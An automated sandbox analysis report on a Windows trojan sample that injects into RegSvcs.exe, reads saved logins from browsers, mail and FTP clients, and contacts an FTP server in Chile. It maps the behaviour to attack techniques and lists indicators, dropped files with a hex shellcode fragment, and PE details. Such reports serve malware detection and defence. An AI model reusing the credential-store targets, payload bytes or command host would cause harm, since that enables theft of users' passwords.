                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: 7F7R8soxHM.exeBinary or memory string: WIN_81
                    Source: 7F7R8soxHM.exeBinary or memory string: WIN_XP
                    Source: 7F7R8soxHM.exeBinary or memory string: WIN_XPe
                    Source: 7F7R8soxHM.exeBinary or memory string: WIN_VISTA
                    Source: 7F7R8soxHM.exeBinary or memory string: WIN_7
                    Source: 7F7R8soxHM.exeBinary or memory string: WIN_8
                    Source: 7F7R8soxHM.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7F7R8soxHM.exe PID: 7568, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7584, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7F7R8soxHM.exe PID: 7568, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7584, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00EE6596
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00EE6A5A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API
                    2
                    Valid Accounts
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    121
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS38
                    System Information Discovery
                    Distributed Component Object Model121
                    Input Capture
                    1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    2
                    Valid Accounts
                    LSA Secrets141
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    11
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials11
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Access Token Manipulation
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                    Process Injection
                    Proc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    7F7R8soxHM.exe66%ReversingLabsWin32.Trojan.AutoitInject
                    7F7R8soxHM.exe64%VirustotalBrowse
                    7F7R8soxHM.exe100%AviraTR/AD.ShellcodeCrypter.snnre
                    7F7R8soxHM.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    ftp.transotraval.cl0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ftp.transotraval.cl0%Avira URL Cloudsafe
                    http://ftp.transotraval.cl0%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ftp.transotraval.cl
                    201.148.105.186
                    truetrueunknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://account.dyn.com/7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://ftp.transotraval.clRegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2883490395.000000000296C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    201.148.105.186
                    ftp.transotraval.clChile
                    265839HOSTINGCLtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1447089
                    Start date and time:2024-05-24 11:17:21 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 39s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:7F7R8soxHM.exe
                    renamed because original name is a hash value
                    Original Sample Name:8f537e91245bcc1510a9867cb88b12ea.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/4@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 56
                    • Number of non-executed functions: 275
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    HOSTINGCLhttps://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=https://agrisil.cl/pbxv/ryt/xxx%23c3VueWEuY2hhbkB5b2dpcHJvZHVjdHMuY29tGet hashmaliciousHTMLPhisherBrowse
                    • 201.148.105.56
                    1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                    • 201.148.107.87
                    https://medilabr.com/w4nmwhg/Get hashmaliciousUnknownBrowse
                    • 201.148.107.213
                    https://broussardsecurity.com/pns/omx/2hm7xsyjqu7Get hashmaliciousPhisherBrowse
                    • 201.148.107.213
                    https://cortivaschools.com/fmg/dt/2ljp5bw2hgaGet hashmaliciousPhisherBrowse
                    • 201.148.107.213
                    https://indigocean.com/x0q/c31/bddgdxodv0uGet hashmaliciousPhisherBrowse
                    • 201.148.107.213
                    OriginalMessage.txt.msgGet hashmaliciousUnknownBrowse
                    • 201.148.107.213
                    https://broussardsecurity.com/asv/sv/83ze8tdfvjpGet hashmaliciousPhisherBrowse
                    • 201.148.107.213
                    _EXTERNAL_ ESA Quarantine - Phish using vendor compromised emails.msgGet hashmaliciousUnknownBrowse
                    • 201.148.107.213
                    _EXTERNAL_ ESA Quarantine - email fails SPF checks.msgGet hashmaliciousPhisherBrowse
                    • 201.148.107.213
                    No context
                    No context
                    Process:C:\Users\user\Desktop\7F7R8soxHM.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):157422
                    Entropy (8bit):7.946097560930617
                    Encrypted:false
                    SSDEEP:3072:HC1FAPrivNNFs0gFyb4sW21DJu7wDdy7XnNIs2aKYgQgPCBi:c+ryNN7csW2dJu7wZy73NIs2aKYgQPU
                    MD5:3D095701F0362BB48E2B18F2919A87A7
                    SHA1:F64D3C86CA252154421171118A80CBE5C06E2645
                    SHA-256:BF7383B2005EAE76087BEB839D84F86B65C17C4F69851C67FB30CA3C70DEE806
                    SHA-512:6F6230AE450040A9B5C33E66E18EC2FB37C11FE079C59DD25BDF3A84124222366490CF541E5543474AA695FE75F12F0765E787D362A2A575081D7FE79966158F
                    Malicious:false
                    Reputation:low
                    Preview:EA06.......SZ.F.K.N)3mn.q3.Tf..Q.Q.3)...d....*,.gJ...0.g....m,.W.........;..q9..)Rj..IU..f...f.j..l.:=n.8.Z.x.Z.*.U.....$...,..J..gt.$..^.d..D.Nf...+.S.Rg.....&.*U....M..H]Bqi.}'S:UT.[4 .mF).j.....I.+.L.TfSZ...(..@....dwe...#@./N.Q...8~ ..oJ..}|.".`..".*Ud.g...J.p.2.P..@.Kg.kR....L..m2..%.7*,.d..)uP.".C..4u*U...2~......kC..'3Z...R....i..S..3.`.o.#7...+.;..v.e_..Ju..2..*t...sI..'..d......f.<...3r.O!...[/m.W..]..W..J;7i......{...........R...N[Y..rv.....Y..=.....T.2..F.E......u....RK...T...?~.z....*....-....;m.&.9.F........d..l.c^.[`R.l. ..7.......>...^.M.B.....$.D.z=.r.+.Y<<...~..M@2.P.A$.."..%t....p....\..E.8HP.....- .E`..}....a7.N6.^.E....._V......f...~`..|.;#.x7..w.7...=.o.&.]n<......_..H...s.Df5:..mH.L.S.}.5...bsz=V.I..)S.}.....b....h.gzt<..o...h.....f......o..N.+.P....e+.7.M.\..2'/....KT......2..._q..lV+T.})...b.:.L....c'.F.5.e2..Ej4.~.[Y.R(.ZUFgG.L.U[%..2.O...dK.4.D..:...9.M......8..u..%BqO..h....`..F*.9..2..nt.D..I.U..(..7.....df..Uu...j!).T
                    Process:C:\Users\user\Desktop\7F7R8soxHM.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):9964
                    Entropy (8bit):7.601948232089083
                    Encrypted:false
                    SSDEEP:192:eyaFcTokLqcFEelaNVvfNa5u0WK30vtTW3Qg/kWTdd2GV2bKnAalGh:AFxkLqcCela/KTWK30vFaQQzTD2GV2aK
                    MD5:8557600CD13C99EC20921F8EC4BF5E47
                    SHA1:0E27680328D89CD63C40E2CAFE42B9E88A064E12
                    SHA-256:E3E26D945A381A34A13D1F288C4D71816648A14761E9270E0D5C53DB5AE73791
                    SHA-512:0DD1364A1F2A676EFD27172A09383CF17C122D4E0E151FEFCDFC95B89BFBB08ADDF4C97D535815CB0C779A32DA1A796DA25B1F3D3DBF955E4B4445F3DDDCE0BC
                    Malicious:false
                    Reputation:low
                    Preview:EA06..t4.M(...aD..fT)..D.Mh.z,.gA....5.......B.Mh..%.mF.Mf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn.
                    Process:C:\Users\user\Desktop\7F7R8soxHM.exe
                    File Type:ASCII text, with very long lines (29748), with no line terminators
                    Category:dropped
                    Size (bytes):29748
                    Entropy (8bit):3.5551070761940133
                    Encrypted:false
                    SSDEEP:768:ViTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbYE+I563b4vfF3if6gys:ViTZ+2QoioGRk6ZklputwjpjBkCiw2Rc
                    MD5:1BA4B453896EFF62C6A724C7F4527561
                    SHA1:AD6C315D54253B2273D5662347BA22F876C7A38C
                    SHA-256:57FD9A461238315EC6DFCD493862BF0D00A736A6F2CD8817FC2264826574334B
                    SHA-512:34080CE06B4F634F11EAF7C193DDC4CBD2EAA518547508FD98F8DBB32FF091377FE1418C1F8FF1F6145FE23D822C583FB51A51966AC7C09284D38C818975DECA
                    Malicious:false
                    Reputation:low
                    Preview:84F98E0D192B10FD05E7E43AEF7957D5930866ABD5D0DA6FF50x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000
                    Process:C:\Users\user\Desktop\7F7R8soxHM.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):241664
                    Entropy (8bit):6.686907580712448
                    Encrypted:false
                    SSDEEP:6144:ffus12Rlhf4nQLcJQNwh3qxtPyavQvz6amVb/nlmoxFp:WRHAucu+jEb/nlz
                    MD5:6B7E59289EE369D7C66EA9D090AE2256
                    SHA1:FE64E804F26AB0C266A1069E3BE8389C014CA8BB
                    SHA-256:0301FF6AB761ECC755B047D7A5FC1C7DC0619CB794191378448CAB53933744EF
                    SHA-512:6BD0ED5F9EB8F508E1AAA39185849BDE8C59D5DC8DBA9FFB293C7EF2CD6CECB925CA13865206F128E7A2E5951403D71A14906DECDE67ABFC85C8D36E1B75C2D2
                    Malicious:false
                    Reputation:low
                    Preview:...5@QJKT8I6..83.Q7962JQ.FA25CQJKP8I6RE83JQ7962JQLFA25CQJKP8.6RE6,._7.?.k.M...a+89k J&Q $U.)0YWYFj3)f3G[c8$k.w..?*\Vd\:3.2JQLFA2e.QJ.Q;I...^3JQ7962J.LD@94HQJ.S8I>RE83JQy.52JqLFA.6CQJ.P8i6RE:3JU7962JQLBA25CQJKP.M6RG83JQ7942..LFQ25SQJKP(I6BE83JQ7)62JQLFA25CQ..S8.6RE8.IQq<62JQLFA25CQJKP8I6RE87J]7962JQLFA25CQJKP8I6RE83JQ7962JQLFA25CQJKP8I6RE83JQ79.2JYLFA25CQJKP8A.REp3JQ7962JQLFoFP;%JKPl.5RE.3JQ.:62HQLFA25CQJKP8I6rE8Sd#DKU2JQ.CA25.RJKV8I6.F83JQ7962JQLFAr5C.d95T&URE43JQ7922JSLFA.6CQJKP8I6RE83J.79t2JQLFA25CQJKP8I6b.;3JQ79~2JQNFD2..SJ#a9I5RE82JQ1962JQLFA25CQJKP8I6RE83JQ7962JQLFA25CQJKP8I6RE83JL......r.<.?!V.m._.5..+..(.v9s_.7R..~.\....'C.zJ.8....X...@.YO2Q......SA 9QeEe^-.\....wj$x..T+.I..G..$Wh.h...wi....9&.`..%.U]'.-61^Pm.+-1J .P.93JQ7.......[M..gH_&}$*......+Nd....?25C5JKPJI6R$83J.796]JQL(A25=QJK.8I6.E83.Q79.2JQiFA2XCQJoP8IHRE8.7^8...#".A25CQ.....[..l.f....;.2.#.......3..7[.&tuq._.*~.T.!Msv.1SC<6HV3::.D.....7GUOIW<J:oKs.......h..C....1.DI6RE83.Q7.62J..F.25C.J.P..6RE..J.7.6...L
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.9460982616861395
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:7F7R8soxHM.exe
                    File size:1'043'968 bytes
                    MD5:8f537e91245bcc1510a9867cb88b12ea
                    SHA1:dfc1fac222ea213d44aa9b5de65c83ffbd80ba0c
                    SHA256:7615090de90b379091f499d125db3c25943f3992e9ed09dab3d2a701d11b2b01
                    SHA512:39d687d2f2264136543d92f0ae8aa614fdb34fb8d26684b90bb5a27bd2da4baae1f690dae598109c94a6ac2397af2b61c60bcf05467d1df8611117a33dc1f524
                    SSDEEP:24576:DAHnh+eWsN3skA4RV1Hom2KXMmHasZTWI89PH3g3m32h5:Oh+ZkldoPK8Yasv8NH3d3M
                    TLSH:B225AC0273D1C032FFAB92739B6AF64556BC79254133852F13982DB9BD701B2227E663
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                    Icon Hash:aaf3e3e3938382a0
                    Entrypoint:0x42800a
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x664B3010 [Mon May 20 11:12:16 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                    Instruction
                    call 00007F67652D209Dh
                    jmp 00007F67652C4E54h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push edi
                    push esi
                    mov esi, dword ptr [esp+10h]
                    mov ecx, dword ptr [esp+14h]
                    mov edi, dword ptr [esp+0Ch]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007F67652C4FDAh
                    cmp edi, eax
                    jc 00007F67652C533Eh
                    bt dword ptr [004C41FCh], 01h
                    jnc 00007F67652C4FD9h
                    rep movsb
                    jmp 00007F67652C52ECh
                    cmp ecx, 00000080h
                    jc 00007F67652C51A4h
                    mov eax, edi
                    xor eax, esi
                    test eax, 0000000Fh
                    jne 00007F67652C4FE0h
                    bt dword ptr [004BF324h], 01h
                    jc 00007F67652C54B0h
                    bt dword ptr [004C41FCh], 00000000h
                    jnc 00007F67652C517Dh
                    test edi, 00000003h
                    jne 00007F67652C518Eh
                    test esi, 00000003h
                    jne 00007F67652C516Dh
                    bt edi, 02h
                    jnc 00007F67652C4FDFh
                    mov eax, dword ptr [esi]
                    sub ecx, 04h
                    lea esi, dword ptr [esi+04h]
                    mov dword ptr [edi], eax
                    lea edi, dword ptr [edi+04h]
                    bt edi, 03h
                    jnc 00007F67652C4FE3h
                    movq xmm1, qword ptr [esi]
                    sub ecx, 08h
                    lea esi, dword ptr [esi+08h]
                    movq qword ptr [edi], xmm1
                    lea edi, dword ptr [edi+08h]
                    test esi, 00000007h
                    je 00007F67652C5035h
                    bt esi, 03h
                    Programming Language:
                    • [ASM] VS2013 build 21005
                    • [ C ] VS2013 build 21005
                    • [C++] VS2013 build 21005
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2013 UPD5 build 40629
                    • [RES] VS2013 build 21005
                    • [LNK] VS2013 UPD5 build 40629
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x34670.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xfd0000x7134.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xc80000x346700x34800775026585519ca34825c41a8804a35f6False0.8737165178571429data7.761448851849117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0xfd0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                    RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                    RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                    RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                    RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                    RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                    RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                    RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                    RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                    RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                    RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
